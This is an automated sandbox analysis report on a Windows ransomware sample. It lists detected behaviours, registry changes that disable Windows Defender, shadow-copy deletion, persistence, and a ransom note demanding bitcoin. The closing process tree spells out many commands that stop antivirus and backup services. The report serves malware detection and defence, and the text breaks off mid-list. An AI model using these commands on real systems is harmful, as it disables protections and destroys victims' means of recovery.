a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709

Analysis

max time kernel
140s
max time network
156s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
07-06-2022 18:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe
Size

87KB
MD5

2ef91650e60c37e9f0b35c3d7e172848
SHA1

76f18f62b8560e77141e0a1c21b0780187fdfdb9
SHA256

a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709
SHA512

be8f454bedbacdc0ac0a07323f951426b917c087cbf533f80d761e03af18bcfe179c762014878a7f5a22c8925cae1498f1d18c792a943b5bce45c636c81cde3f

Score

10^/10

evasion persistence ransomware trojan

Malware Config

Signatures

Contains code to disable Windows Defender 1 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

Processes:

resource	yara_rule
behavioral2/memory/3760-130-0x0000000000450000-0x000000000046C000-memory.dmp	disable_win_def

Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

Processes:

a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Blocklisted process makes network request 2 IoCs

Processes:

mshta.exe

flow pid process

37 3864 mshta.exe
38 3864 mshta.exe
Downloads MZ/PE file
Executes dropped EXE 1 IoCs

Processes:

agfdupi1.exe

pid process

664 agfdupi1.exe

flow	pid	process
37	3864	mshta.exe
38	3864	mshta.exe

pid	process
664	agfdupi1.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe

Drops startup file 1 IoCs

Processes:

a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe

Windows security modification 2 TTPs 1 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0"	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe

Enumerates connected drives 3 TTPs 18 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

description	ioc	process
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\f:	vssadmin.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\f:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Modifies WinLogon 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

Processes:

a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Information..."	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "Your Files are Encrypted.\r\n\r\nDon’t worry, you can return all your files!\r\n\r\nYou've got 48 hours(2 Days), before you lost your files forever.\r\nI will treat you good if you treat me good too.\r\n\r\nThe Price to get all things to the normal : 20,000$\r\nMy BTC Wallet ID :\r\n1F6sq8YvftTfuE4QcYxfK8s5XFUUHC7sD9\r\n\r\nContact :\r\[email protected]\r\n"	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe

Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exe

pid process

796 sc.exe
2888 sc.exe
1748 sc.exe
5044 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

pid	process
796	sc.exe
2888	sc.exe
1748	sc.exe
5044	sc.exe

Interacts with shadow copies 2 TTPs 14 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

Processes:

vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

pid	process
5224	vssadmin.exe
5340	vssadmin.exe
5332	vssadmin.exe
5324	vssadmin.exe
5308	vssadmin.exe
5284	vssadmin.exe
5276	vssadmin.exe
5300	vssadmin.exe
5268	vssadmin.exe
5260	vssadmin.exe
5316	vssadmin.exe
5292	vssadmin.exe
5252	vssadmin.exe
5244	vssadmin.exe

Kills process with taskkill 3 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exe

pid process

1516 taskkill.exe
3808 taskkill.exe
4500 taskkill.exe
Runs net.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

4804 PING.EXE

pid	process
1516	taskkill.exe
3808	taskkill.exe
4500	taskkill.exe

pid	process
4804	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exepowershell.exe

pid	process
3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe
3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe
3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe
3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe
3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe
3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe
3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe
3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe
3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe
3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe
3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe
3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe
3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe
3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe
3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe
3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe
3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe
3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe
3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe
3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe
3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe
3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe
3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe
3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe
3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe
3000	powershell.exe
3000	powershell.exe
3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe
3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe
3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe
3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe
3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe
3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe
3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe
3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe
3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe
3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe
3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe
3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe
3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe
3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe
3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe
3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe
3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe
3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe
3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe
3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe
3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe
3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe
3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe
3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe
3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe
3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe
3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe
3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe
3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe
3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe
3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe
3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe
3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe
3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe
3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe
3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe
3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe

Suspicious use of AdjustPrivilegeToken 11 IoCs

Processes:

a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exepowershell.exetaskkill.exetaskkill.exetaskkill.exevssvc.exeagfdupi1.exe

description	pid	process
Token: SeDebugPrivilege	3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe
Token: SeDebugPrivilege	3000	powershell.exe
Token: SeDebugPrivilege	1516	taskkill.exe
Token: SeDebugPrivilege	3808	taskkill.exe
Token: SeDebugPrivilege	4500	taskkill.exe
Token: SeBackupPrivilege	5128	vssvc.exe
Token: SeRestorePrivilege	5128	vssvc.exe
Token: SeAuditPrivilege	5128	vssvc.exe
Token: SeAssignPrimaryTokenPrivilege	664	agfdupi1.exe
Token: SeIncreaseQuotaPrivilege	664	agfdupi1.exe
Token: SeImpersonatePrivilege	664	agfdupi1.exe

Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe

pid	process
3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe
3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe
3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe

Suspicious use of SendNotifyMessage 3 IoCs

Processes:

a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe

pid	process
3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe
3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe
3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exe

description	pid	process	target process
PID 3760 wrote to memory of 3000	3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe	powershell.exe
PID 3760 wrote to memory of 3000	3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe	powershell.exe
PID 3760 wrote to memory of 4592	3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe	net.exe
PID 3760 wrote to memory of 4592	3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe	net.exe
PID 3760 wrote to memory of 4140	3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe	net.exe
PID 3760 wrote to memory of 4140	3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe	net.exe
PID 3760 wrote to memory of 4824	3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe	net.exe
PID 3760 wrote to memory of 4824	3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe	net.exe
PID 3760 wrote to memory of 764	3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe	net.exe
PID 3760 wrote to memory of 764	3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe	net.exe
PID 3760 wrote to memory of 4584	3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe	net.exe
PID 3760 wrote to memory of 4584	3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe	net.exe
PID 3760 wrote to memory of 4568	3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe	net.exe
PID 3760 wrote to memory of 4568	3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe	net.exe
PID 3760 wrote to memory of 4460	3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe	net.exe
PID 3760 wrote to memory of 4460	3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe	net.exe
PID 3760 wrote to memory of 4416	3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe	net.exe
PID 3760 wrote to memory of 4416	3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe	net.exe
PID 3760 wrote to memory of 3848	3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe	net.exe
PID 3760 wrote to memory of 3848	3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe	net.exe
PID 3760 wrote to memory of 4960	3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe	net.exe
PID 3760 wrote to memory of 4960	3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe	net.exe
PID 3760 wrote to memory of 1232	3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe	net.exe
PID 3760 wrote to memory of 1232	3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe	net.exe
PID 4592 wrote to memory of 2944	4592	net.exe	net1.exe
PID 4592 wrote to memory of 2944	4592	net.exe	net1.exe
PID 3760 wrote to memory of 1444	3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe	net.exe
PID 3760 wrote to memory of 1444	3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe	net.exe
PID 4140 wrote to memory of 2756	4140	net.exe	net1.exe
PID 4140 wrote to memory of 2756	4140	net.exe	net1.exe
PID 3760 wrote to memory of 3832	3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe	net.exe
PID 3760 wrote to memory of 3832	3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe	net.exe
PID 4584 wrote to memory of 3252	4584	net.exe	net1.exe
PID 4584 wrote to memory of 3252	4584	net.exe	net1.exe
PID 764 wrote to memory of 4308	764	net.exe	net1.exe
PID 764 wrote to memory of 4308	764	net.exe	net1.exe
PID 4824 wrote to memory of 5000	4824	net.exe	net1.exe
PID 4824 wrote to memory of 5000	4824	net.exe	net1.exe
PID 3760 wrote to memory of 220	3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe	net.exe
PID 3760 wrote to memory of 220	3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe	net.exe
PID 3760 wrote to memory of 2324	3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe	net.exe
PID 3760 wrote to memory of 2324	3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe	net.exe
PID 3760 wrote to memory of 3708	3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe	net.exe
PID 3760 wrote to memory of 3708	3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe	net.exe
PID 4460 wrote to memory of 3532	4460	net.exe	net1.exe
PID 4460 wrote to memory of 3532	4460	net.exe	net1.exe
PID 4416 wrote to memory of 2196	4416	net.exe	net1.exe
PID 4416 wrote to memory of 2196	4416	net.exe	net1.exe
PID 4568 wrote to memory of 2292	4568	net.exe	net1.exe
PID 4568 wrote to memory of 2292	4568	net.exe	net1.exe
PID 4960 wrote to memory of 3308	4960	net.exe	net1.exe
PID 4960 wrote to memory of 3308	4960	net.exe	net1.exe
PID 3760 wrote to memory of 4864	3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe	net.exe
PID 3760 wrote to memory of 4864	3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe	net.exe
PID 3848 wrote to memory of 984	3848	net.exe	net1.exe
PID 3848 wrote to memory of 984	3848	net.exe	net1.exe
PID 1232 wrote to memory of 1044	1232	net.exe	net1.exe
PID 1232 wrote to memory of 1044	1232	net.exe	net1.exe
PID 3760 wrote to memory of 1400	3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe	net.exe
PID 3760 wrote to memory of 1400	3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe	net.exe
PID 1444 wrote to memory of 4056	1444	net.exe	net1.exe
PID 1444 wrote to memory of 4056	1444	net.exe	net1.exe
PID 3760 wrote to memory of 4876	3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe	net.exe
PID 3760 wrote to memory of 4876	3760	a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe	net.exe

C:\Users\Admin\AppData\Local\Temp\a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe
"C:\Users\Admin\AppData\Local\Temp\a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe"
1⤵
- Modifies Windows Defender Real-time Protection settings
- Checks computer location settings
- Drops startup file
- Windows security modification
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3760
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" Get-MpPreference -verbose
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3000
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop avpsus /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4592
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop avpsus /y
    3⤵
    PID:2944
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop McAfeeDLPAgentService /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4140
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
    3⤵
    PID:2756
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop mfewc /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4824
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mfewc /y
    3⤵
    PID:5000
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BMR Boot Service /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:764
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BMR Boot Service /y
    3⤵
    PID:4308
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop NetBackup BMR MTFTP Service /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4584
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
    3⤵
    PID:3252
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop DefWatch /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4568
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop DefWatch /y
    3⤵
    PID:2292
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ccEvtMgr /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4460
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ccEvtMgr /y
    3⤵
    PID:3532
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ccSetMgr /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4416
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ccSetMgr /y
    3⤵
    PID:2196
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SavRoam /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3848
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SavRoam /y
    3⤵
    PID:984
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop RTVscan /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4960
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop RTVscan /y
    3⤵
    PID:3308
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop QBIDPService /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1444
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop QBIDPService /y
    3⤵
    PID:4056
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop Intuit.QuickBooks.FCS /y
  2⤵
  PID:3832
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
    3⤵
    PID:3388
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop QBFCService /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1232
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop QBFCService /y
    3⤵
    PID:1044
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop QBCFMonitorService /y
  2⤵
  PID:220
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop QBCFMonitorService /y
    3⤵
    PID:2904
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop YooIT /y
  2⤵
  PID:3708
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop YooIT /y
    3⤵
    PID:2380
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop zhudongfangyu /y
  2⤵
  PID:4864
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop zhudongfangyu /y
    3⤵
    PID:5048
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop stc_raw_agent /y
  2⤵
  PID:1400
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop stc_raw_agent /y
    3⤵
    PID:4964
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop YooBackup /y
  2⤵
  PID:2324
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop YooBackup /y
    3⤵
    PID:4812
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VSNAPVSS /y
  2⤵
  PID:4876
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VSNAPVSS /y
    3⤵
    PID:4860
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamTransportSvc /y
  2⤵
  PID:3888
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamTransportSvc /y
    3⤵
    PID:2320
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamDeploymentService /y
  2⤵
  PID:3236
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamDeploymentService /y
    3⤵
    PID:1740
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamNFSSvc /y
  2⤵
  PID:1380
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamNFSSvc /y
    3⤵
    PID:3720
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop PDVFSService /y
  2⤵
  PID:4708
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop PDVFSService /y
    3⤵
    PID:2080
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecAgentBrowser /y
  2⤵
  PID:4296
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
    3⤵
    PID:4492
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecDiveciMediaService /y
  2⤵
  PID:444
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
    3⤵
    PID:4520
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecJobEngine /y
  2⤵
  PID:4316
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecJobEngine /y
    3⤵
    PID:3352
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecRPCService /y
  2⤵
  PID:3856
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecRPCService /y
    3⤵
    PID:1520
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop AcrSch2Svc /y
  2⤵
  PID:4348
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop AcrSch2Svc /y
    3⤵
    PID:4848
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop AcronisAgent /y
  2⤵
  PID:2892
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop AcronisAgent /y
    3⤵
    PID:3544
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop sophos /y
  2⤵
  PID:4872
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop sophos /y
    3⤵
    PID:5204
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SstpSvc start= disabled
  2⤵
  - Launches sc.exe
  PID:796
- C:\Windows\SYSTEM32\taskkill.exe
